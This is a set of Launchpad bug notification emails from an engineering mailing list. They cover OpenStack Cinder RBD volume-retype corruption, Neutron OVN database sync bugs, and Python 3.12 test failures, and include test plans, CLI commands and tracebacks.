### Possible cause W
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
This bug was fixed in the package cinder - 2:22.1.1-0ubuntu1.1~cloud0 --- cinder (2:22.1.1-0ubuntu1.1~cloud0) jammy-antelope; urgency=medium . * revert driver assister volume retype (LP: #2019190) - d/p/0001-Revert-Driver-assisted-migration-on-retype-when-it-s.patch ** Changed in: cloud-archive/antelope Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Committed Status in Ubuntu Cloud Archive zed series: Fix Committed Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: Fix Committed Status in cinder source package in Lunar: Won't Fix Status in cinder source package in Mantic: Fix Released Status in cinder source package in Noble: Fix Released Bug description: [Impact] See bug description for full details but short summary is that a patch landed in Wallaby release that introduced a regression whereby retyping an in-use volume leaves the attached volume in an inconsistent state with potential for data corruption. Result is that a vm does not receive updated connection_info from Cinder and will keep pointing to the old volume, even after reboot. [Test Plan] * Deploy Openstack with two Cinder RBD storage backends (different pools) * Create two volume types * Boot a vm from volume: openstack server create --wait --image jammy --flavor m1.small --key-name testkey --nic net-id=8c74f1ef-9231-46f4-a492-eccdb7943ecd testvm --boot-from-volume 10 * Retype the volume to type B: openstack volume set --type typeB --retype-policy on-demand * Go to compute host running vm and check that the vm is now copying data to the new location e.g. b68be47d-f526-4f98-a77b-a903bf8b6c65 which will eventually settle and change to: b68be47d-f526-4f98-a77b-a903bf8b6c65 * And lastly a reboot of the vm should be successfull. [Regression Potential] Given that the current state is potential data corruption and the patch will fix this by successfully refreshing connection info I do not see a regression potential. It is in fact fixing a regression. - While trying out the volume retype feature in cinder, we noticed that after an instance is rebooted it will not come back online and be stuck in an error state or if it comes back online, its filesystem is corrupted. ## Observations Say there are the two volume types `fast` (stored in ceph pool `volumes`) and `slow` (stored in ceph pool `volumes.hdd`). Before the retyping we can see that the volume for example is present in the `volumes.hdd` pool and has a watcher accessing the volume. ```sh [ceph: root@mon0 /]# rbd ls volumes.hdd volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes.hdd/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: watcher=[2001:XX:XX:XX::10ad]:0/3914407456 client.365192 cookie=140370268803456 ``` Starting the retyping process using the migration policy `on-demand` for that volume either via the horizon dashboard or the CLI causes the volume to be correctly transferred to the `volumes` pool within the ceph cluster. However, the watcher does not get transferred, so nobody is accessing the volume after it has been transferred. ```sh [ceph: root@mon0 /]# rbd ls volumes volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: none ``` Taking a look at the libvirt XML of the instance in question, one can see that the `rbd` volume path does not change after the retyping is completed. Therefore, if the instance is restarted nova will not be able to find its volume preventing an instance start. Pre retype ```xml [...] [...] ``` Post retype (no change) ```xml [...] [...] ``` ### Possib
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
This bug was fixed in the package cinder - 2:23.0.0-0ubuntu1.1~cloud0 --- cinder (2:23.0.0-0ubuntu1.1~cloud0) jammy-bobcat; urgency=medium . * New update for the Ubuntu Cloud Archive. . cinder (2:23.0.0-0ubuntu1.1) mantic; urgency=medium . [ Corey Bryant ] * d/gbp.conf: Create stable/2023.2 branch. * d/gbp.conf, .launchpad.yaml: Sync from cloud-archive-tools for bobcat. . [ Edward Hope-Morley ] * revert driver assister volume retype (LP: #2019190) - d/p/0001-Revert-Driver-assisted-migration-on-retype-when-it-s.patch ** Changed in: cloud-archive/bobcat Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Committed Status in Ubuntu Cloud Archive zed series: Fix Committed Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: Fix Committed Status in cinder source package in Lunar: Won't Fix Status in cinder source package in Mantic: Fix Released Status in cinder source package in Noble: Fix Released Bug description: [Impact] See bug description for full details but short summary is that a patch landed in Wallaby release that introduced a regression whereby retyping an in-use volume leaves the attached volume in an inconsistent state with potential for data corruption. Result is that a vm does not receive updated connection_info from Cinder and will keep pointing to the old volume, even after reboot. [Test Plan] * Deploy Openstack with two Cinder RBD storage backends (different pools) * Create two volume types * Boot a vm from volume: openstack server create --wait --image jammy --flavor m1.small --key-name testkey --nic net-id=8c74f1ef-9231-46f4-a492-eccdb7943ecd testvm --boot-from-volume 10 * Retype the volume to type B: openstack volume set --type typeB --retype-policy on-demand * Go to compute host running vm and check that the vm is now copying data to the new location e.g. b68be47d-f526-4f98-a77b-a903bf8b6c65 which will eventually settle and change to: b68be47d-f526-4f98-a77b-a903bf8b6c65 * And lastly a reboot of the vm should be successfull. [Regression Potential] Given that the current state is potential data corruption and the patch will fix this by successfully refreshing connection info I do not see a regression potential. It is in fact fixing a regression. - While trying out the volume retype feature in cinder, we noticed that after an instance is rebooted it will not come back online and be stuck in an error state or if it comes back online, its filesystem is corrupted. ## Observations Say there are the two volume types `fast` (stored in ceph pool `volumes`) and `slow` (stored in ceph pool `volumes.hdd`). Before the retyping we can see that the volume for example is present in the `volumes.hdd` pool and has a watcher accessing the volume. ```sh [ceph: root@mon0 /]# rbd ls volumes.hdd volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes.hdd/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: watcher=[2001:XX:XX:XX::10ad]:0/3914407456 client.365192 cookie=140370268803456 ``` Starting the retyping process using the migration policy `on-demand` for that volume either via the horizon dashboard or the CLI causes the volume to be correctly transferred to the `volumes` pool within the ceph cluster. However, the watcher does not get transferred, so nobody is accessing the volume after it has been transferred. ```sh [ceph: root@mon0 /]# rbd ls volumes volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: none ``` Taking a look at the libvirt XML of the instance in question, one can see that the `rbd` volume path does not change after the retyping is completed. Therefore, if the i
[Yahoo-eng-team] [Bug 1955578] Please test proposed package
Hello Arnau, or anyone else affected, Accepted neutron into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1955578 Title: OVN transaction could not be completed due to a race condition Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Triaged Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: When executing the test "test_connectivity_through_2_routers" it is highly possible to have a race condition: networking_ovn.common.exceptions.RevisionConflict: OVN revision number for {PORT_ID} (type: ports) is equal or higher than the given resource. Skipping update. Bugzilla reference: https://bugzilla.redhat.com/show_bug.cgi?id=1860448 = Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OVN. Run the test_connectivity_through_2_routers test from https://github.com/openstack/neutron-tempest-plugin. This could also be tested manually based on what that test does. Ensure the router port status is not set to DOWN at any point. [Where problems could occur] The existing bug could still occur if the assumpion that specifying the port type is not correct. Presumably this is not the case, but that is a theoritical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1955578/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1961112] Please test proposed package
Hello Daniel, or anyone else affected, Accepted neutron into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1961112 Title: [ovn] overlapping security group rules break neutron-ovn-db-sync-util Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: Neutron (Xena) is happy to accept equivalent rules with overlapping remote CIDR prefix as long as the notation is different, e.g. 10.0.0.0/8 and 10.0.0.1/8. However, OVN is smarter, normalizes the prefix and figures out that they both are 10.0.0.0/8. This does not have any fatal effects in a running OVN deployment (creating and using such rules does not even trigger a warning) but upon running neutron-ovn-db-sync-util, it crashes and won't perform a sync. This is a blocker for upgrades (and other scenarios). Security group's rules: $ openstack security group rule list overlap-sgr +--+-+---+++---+---+--+ | ID | IP Protocol | Ethertype | IP Range | Port Range | Direction | Remote Security Group | Remote Address Group | +--+-+---+++---+---+--+ | 3c41fa80-1d23-49c9-9ec1-adf581e07e24 | tcp | IPv4 | 10.0.0.1/8 || ingress | None | None | | 639d263e-6873-47cb-b2c4-17fc824252db | None| IPv4 | 0.0.0.0/0 || egress| None | None | | 96e99039-cbc0-48fe-98fe-ef28d41b9d9b | tcp | IPv4 | 10.0.0.0/8 || ingress | None | None | | bf9160a3-fc9b-467e-85d5-c889811fd6ca | None| IPv6 | ::/0 || egress| None | None | +--+-+---+++---+---+--+ Log excerpt: 16/Feb/2022:20:55:40.568 527216 INFO neutron.cmd.ovn.neutron_ovn_db_sync_util [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Sync for Northbound db started with mode : repair 16/Feb/2022:20:55:42.105 527216 INFO neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.extensions.qos [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Starting OVNClientQosExtension 16/Feb/2022:20:55:42.380 527216 INFO neutron.db.ovn_revision_numbers_db [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Successfully bumped revision number for resource 49b3249a-7624-4711-b271-3e63c6a27658 (type: ports) to 17 16/Feb/2022:20:55:43.205 527216 WARNING neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_db_sync [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] ACLs-to-be-added 1 ACLs-to-be-removed 0 16/Feb/2022:20:55:43.206 527216 WARNING neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_db_sync [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] ACL found in Neutron but not in OVN DB for port group pg_e90b68f3_9f8d_4250_9b6a_7531e2249c99 16/Feb/2022:20:55:43.208 527216 ERROR ovsdbapp.backend.ovs_idl.transaction [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Traceback (most recent call last): Â Â File "/usr/lib/python3/dist-packages/ovsdbapp/backend/ovs_idl/connection.py", line 131, in run txn.results.put(txn.do_commit()) Â Â File "/usr/lib/python3/dist-packages/ovsdbapp/backend/ovs_idl/transaction.py", line 93, in do_commit command.
[Yahoo-eng-team] [Bug 2008943] Please test proposed package
Hello Miro, or anyone else affected, Accepted neutron into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2008943 Title: OVN DB Sync utility cannot find NB DB Port Group Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Triaged Status in Ubuntu Cloud Archive wallaby series: Triaged Status in Ubuntu Cloud Archive xena series: Triaged Status in neutron: In Progress Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: Runtime exception: ovsdbapp.backend.ovs_idl.idlutils.RowNotFound: Cannot find Port_Group with name=pg_aa9f203b_ec51_4893_9bda_cfadbff9f800 can occure while performing database sync between Neutron db and OVN NB db using neutron-ovn-db-sync-util. This exception occures when the `sync_networks_ports_and_dhcp_opts()` function ends up implicitly creating a new default security group for a tenant/project id. This is normally ok but the problem is that `sync_port_groups` was already called and thus the port_group does not exists in NB DB. When the `sync_acls()` is called later there is no port group found and exception occurs. Quick way to reproduce on ML2/OVN: - openstack project create test_project - openstack create network --project test_project test_network - openstack port delete $(openstack port list --network test_network -c ID -f value) # since this is an empty network only the metadata port should get listed and subsequently deleted - openstack security group delete test_project So now that you have a network without a metadata port in it and no default security group for the project/tenant that this network belongs to run neutron-ovn-db-sync-util --config-file /etc/neutron/neutron.conf --config-file /etc/neutron/plugins/ml2/ml2_conf.ini --ovn- neutron_sync_mode migrate The exeption should occur Here is a more realistic scenario how we can run into this with ML2/OVS to ML2/OVN migration. I am also including why the code runs into it. 1. ML2/OVS enviroment with a network but no default security group for the project/tenant associated with the network 2. Perform ML2/OVS to ML2/OVN migration. This migration process will run neutron-ovn-db-sync-util with --migrate 3. During the sync we first sync port groups[1] from Neutron DB to OVN DB 4. Then we sync network ports [2]. The process will detect that the network in question is not part of OVN NB. It will create that network in OVN NB db and along with that it will create a metadata port for it(OVN network requires metadataport). The Port_create call will implicitly notify _ensure_default_security_group_handler which will not find securty group for that tenant/project id and create one. Now you have a new security group with 4 new default security group rules. 5. When sync_acls[4] runs it will pick up those 4 new rules but commit to NB DB will fail since the port_group(aka security group) does not exists in NB DB [1] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L104 [2] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L10 [3] https://opendev.org/openstack/neutron/src/branch/master/neutron/db/securitygroups_db.py#L915 [4] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L107 = Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OVN. Follow steps in "Quick way to reproduce on ML2/OVN" from bug description. [Where problems could occur] The fix mitigate
[Yahoo-eng-team] [Bug 2030773] Please test proposed package
Hello Lucas, or anyone else affected, Accepted neutron into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2030773 Title: OVN DB Sync always logs warning messages about updating all router ports Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Triaged Status in Ubuntu Cloud Archive wallaby series: Triaged Status in Ubuntu Cloud Archive xena series: Triaged Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: Reported at: https://bugzilla.redhat.com/show_bug.cgi?id=2225156 The ovn-db-sync script does not check if the router ports are actually out-of-sync before adding it to the list of ports that needs to be updated, this can create red herring problems by introducing an irrelevant piece of information [0] in the sync report (specially when ran in "log" mode) making the user think that the databases might be out-of-sync even when it is not. Looking at the code [1] we can see that the comment talks about checking the networks and ipv6_ra_configs changes but it does neither; instead, it adds every router port to the list of ports that needs to be updated. # We dont have to check for the networks and # ipv6_ra_configs values. Lets add it to the # update_lrport_list. If they are in sync, then # update_router_port will be a no-op. update_lrport_list.append(db_router_ports[lrport]) This LP is about changing this behavior and checking for such differences in the router ports before marking them to be updated. [0] 2023-07-24 11:46:31.391 952358 WARNING networking_ovn.ovn_db_sync [req-1081a8a6-82dd-431c-a2ab-f58741dc1677 - - - - -] Router Port port_id=f164c0f1-8ac8-4c45-bba9-8c723a30c701 needs to be updated for networks changed [1] https://github.com/openstack/neutron/blob/c453813d0664259c4da0d132f224be2eebe70072/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L553-L557 = Ubuntu SRU Details = [Impact] See bug description above. [Test Case] Deploy openstack with OVN and multiple routers. Run the ovn-db-sync script and ensure router ports that are not out of sync are not marked to be updated. [Where problems could occur] If the _is_router_port_changed() function had a bug there would be potential for ports to be filtered out that need updating. Presumably this is not the case, but that is a theoritical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2030773/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 2032770] Please test proposed package
Hello Mustafa, or anyone else affected, Accepted neutron into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2032770 Title: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Triaged Status in Ubuntu Cloud Archive wallaby series: Triaged Status in Ubuntu Cloud Archive xena series: Triaged Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: [Impact] This SRU is a backport of https://review.opendev.org/c/openstack/neutron/+/892895 to the respective Ubuntu and UCA releases. The patch is merged to all respective upstream branches (master & stable/[u,v,w,x,y,z,2023.1(a)]). This SRU intends to add the missing 'uplink-status-propagation' extension to ML2/OVN. This extension is already present and working in ML2/OVS, and it is supported by ML2/OVN but the extension is somehow not added to ML2/OVN. The patch simply adds the missing extension to the ML2/OVN too. The impact of this is visible for the deployments migrating from ML2/OVS to ML2/OVN. The following command fails to work on ML2/OVN: ``` openstack port create --network 8d30fb08-2c6a-42fd-98c4-223d345c8c4f --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa # BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status' ``` The fix corrects this behavior by adding the missing extension. [Test Case] - Deploy a Focal/Yoga cloud: - ./generate-bundle.sh -s focal -r yoga --name test-focal-yoga-stack --run --ovn # After the dust settles - ./configure - source ./novarc - openstack port create --network --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa - It should fail with "BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status'" To confirm the fix, repeat the scenario and observe that the error disappears and port creation succeeds. [Regression Potential] The patch is quite trivial and should not affect any deployment negatively. The extension is optional and disabled by default. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2032770/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 2051928] [NEW] tests - Python 3.12 - TypeError: Object of type _SentinelObject is not JSON serializable
Public bug reported: Executing unit tests with Python 3.12 results in some test failures which I think are todo with the way the unit tests mock the __json__ method in the tools module: neutron.tests.unit.api.v2.test_base.RegistryNotificationTest.test_networks_create_bulk_registry_publish --- Captured traceback: ~~~ Traceback (most recent call last):   File "/home/jamespage/src/upstream/openstack/neutron/neutron/tests/base.py", line 178, in func return f(self, *args, **kwargs)      File "/home/jamespage/src/upstream/openstack/neutron/neutron/tests/unit/api/v2/test_base.py", line 1300, in test_networks_create_bulk_registry_publish self._test_registry_publish('create', 'network', input)   File "/home/jamespage/src/upstream/openstack/neutron/neutron/tests/unit/api/v2/test_base.py", line 1269, in _test_registry_publish res = self.api.post_json(   ^^^ No tests were successful during the run   File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/webtest/utils.py", line 34, in wrapper return self._gen_request(method, url, **kw)      File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/webtest/app.py", line 749, in _gen_request return self.do_request(req, status=status,    ^^^   File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/webtest/app.py", line 646, in do_request self._check_status(status, res)   File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/webtest/app.py", line 675, in _check_status raise AppError( webtest.app.AppError: Bad response: 500 Internal Server Error (not 200 OK or 3xx redirect for http://localhost/networks) b'{"NeutronError": {"type": "HTTPInternalServerError", "message": "Request Failed: internal server error while processing your request.", "detail": ""}}' Captured pythonlogging: ~~~    ERROR [neutron.pecan_wsgi.hooks.translation] POST failed. Traceback (most recent call last):   File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/core.py", line 682, in __call__ self.invoke_controller(controller, args, kwargs, state)   File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/core.py", line 603, in invoke_controller result = self.render(template, result)  ^   File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/core.py", line 414, in render return renderer.render(template, namespace)      File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/templating.py", line 23, in render return encode(namespace)    ^   File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/jsonify.py", line 154, in encode return _instance.encode(obj)    ^   File "/usr/lib/python3.12/json/encoder.py", line 200, in encode chunks = self.iterencode(o, _one_shot=True)  ^^   File "/usr/lib/python3.12/json/encoder.py", line 258, in iterencode return _iterencode(o, 0)    ^   File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/jsonify.py", line 148, in default return jsonify(obj)      File "/usr/lib/python3.12/functools.py", line 909, in wrapper return dispatch(args[0].__class__)(*args, **kw)      File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/jsonify.py", line 143, in jsonify return _default.default(obj)    ^   File "/home/jamespage/src/upstream/openstack/neutron/.tox/py312/lib/python3.12/site-packages/pecan/jsonify.py", line 129, in default return JSONEncoder.default(self, obj)    ^^   File "/usr/lib/python3.12/json/encoder.py", line 180, in default raise TypeError(f'Object of type {o.__class__.__name__} ' TypeError: Object of type _SentinelObject is not JSON serializable Digging in I can see all of the plugin child calls being updated, however I don't see them actually called under Python 3.12. This issue impacts the following unit tests: FAIL: neutron.tests.unit.api.v2.test_base.RegistryNotificationTest.test_network_create_registry_publish FAIL: neutron.tests.unit.api.v2.test_bas
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
** Changed in: cinder (Ubuntu Lunar) Status: New => Won't Fix -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: In Progress Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: New Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: New Status in cinder source package in Lunar: Won't Fix Status in cinder source package in Mantic: In Progress Status in cinder source package in Noble: Fix Released Bug description: [Impact] See bug description for full details but short summary is that a patch landed in Wallaby release that introduced a regression whereby retyping an in-use volume leaves the attached volume in an inconsistent state with potential for data corruption. Result is that a vm does not receive updated connection_info from Cinder and will keep pointing to the old volume, even after reboot. [Test Plan] * Deploy Openstack with two Cinder RBD storage backends (different pools) * Create two volume types * Boot a vm from volume: openstack server create --wait --image jammy --flavor m1.small --key-name testkey --nic net-id=8c74f1ef-9231-46f4-a492-eccdb7943ecd testvm --boot-from-volume 10 * Retype the volume to type B: openstack volume set --type typeB --retype-policy on-demand * Go to compute host running vm and check that the vm is now copying data to the new location e.g. b68be47d-f526-4f98-a77b-a903bf8b6c65 which will eventually settle and change to: b68be47d-f526-4f98-a77b-a903bf8b6c65 * And lastly a reboot of the vm should be successfull. [Regression Potential] Given that the current state is potential data corruption and the patch will fix this by successfully refreshing connection info I do not see a regression potential. It is in fact fixing a regression. - While trying out the volume retype feature in cinder, we noticed that after an instance is rebooted it will not come back online and be stuck in an error state or if it comes back online, its filesystem is corrupted. ## Observations Say there are the two volume types `fast` (stored in ceph pool `volumes`) and `slow` (stored in ceph pool `volumes.hdd`). Before the retyping we can see that the volume for example is present in the `volumes.hdd` pool and has a watcher accessing the volume. ```sh [ceph: root@mon0 /]# rbd ls volumes.hdd volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes.hdd/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: watcher=[2001:XX:XX:XX::10ad]:0/3914407456 client.365192 cookie=140370268803456 ``` Starting the retyping process using the migration policy `on-demand` for that volume either via the horizon dashboard or the CLI causes the volume to be correctly transferred to the `volumes` pool within the ceph cluster. 